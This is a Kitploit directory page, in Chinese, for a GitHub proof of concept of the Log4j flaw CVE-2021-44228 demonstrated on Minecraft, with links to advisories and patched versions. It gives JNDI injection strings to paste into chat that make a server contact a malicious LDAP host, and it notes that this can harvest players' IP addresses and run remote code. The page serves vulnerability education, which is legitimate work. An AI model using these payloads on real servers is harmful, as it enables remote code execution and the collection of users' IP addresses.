Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4j-PoC — 一个针对 Minecraft 中 Log4j 漏洞 (CVE-2021-44228) 的教育性概念验证 | Kitploit
工具/GitHubGitHub/sma-das/log4j-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubsma-das/log4j-poc

Log4j-PoC

一个针对 Minecraft 中 Log4j 漏洞 (CVE-2021-44228) 的教育性概念验证

查看仓库
33年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4j(CVE-2021-44228)的概念验证

免责声明

本项目仅用于教育目的。


简介

这是改编自 HyCraftHD 的 log4j RCE 概念验证。

以下是一些关于 CVE-2021-44228 的链接:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

该漏洞影响几乎所有 log4j2 版本,可能也影响 log4j1 版本。推荐使用的版本是 2.15.0,它修复了该漏洞。

使用 minecraft(使用 log4j2)进行演示

  • 有关对 minecraft 影响的具体信息列在此处:https://twitter.com/slicedlime/status/1469150993527017483
  • minecraft 的文章在此:https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • 已修复的 minecraft forge 版本:https://twitter.com/gigaherz/status/1469331288368861195
  • 来自 minecraft forge 的详细文章:https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • 已修复的 minecraft fabric 版本:https://twitter.com/slicedlime/status/1469192689904193537
  • 已修复的 minecraft paper 版本:https://twitter.com/aurora_smiles_/status/1469205803232026625
  • 已修复的 minecraft spigot 版本:https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • 已修复的 minecraft sponge 版本:https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

卡顿或发送序列化数据

  • 在聊天框中粘贴 ${jndi:ldap://127.0.0.1/e}。如果端口 389 上存在开放套接字,log4j 将尝试连接并阻塞后续通信,直到超时。
  • 使用此概念验证漏洞时,控制台中的日志会记录 THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!,这是来自 ldap 服务器的序列化字符串对象。

image

  • 此外,恶意 ldap 服务器会收到记录该消息的每个 IP 地址。这意味着可以利用此漏洞收集服务器上玩家的 IP 地址。

RCE

  • 在聊天框中粘贴 ${jndi:ldap://127.0.0.1/exe}。如果 -Dcom.sun.jndi.ldap.object.trustURLCodebase=true 被设置为 true,则会执行远程代码。

image

  • 幸运的是,现代 JDK 默认禁用远程类加载。(https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • 旧版本可能仍然允许此操作!!
下载工具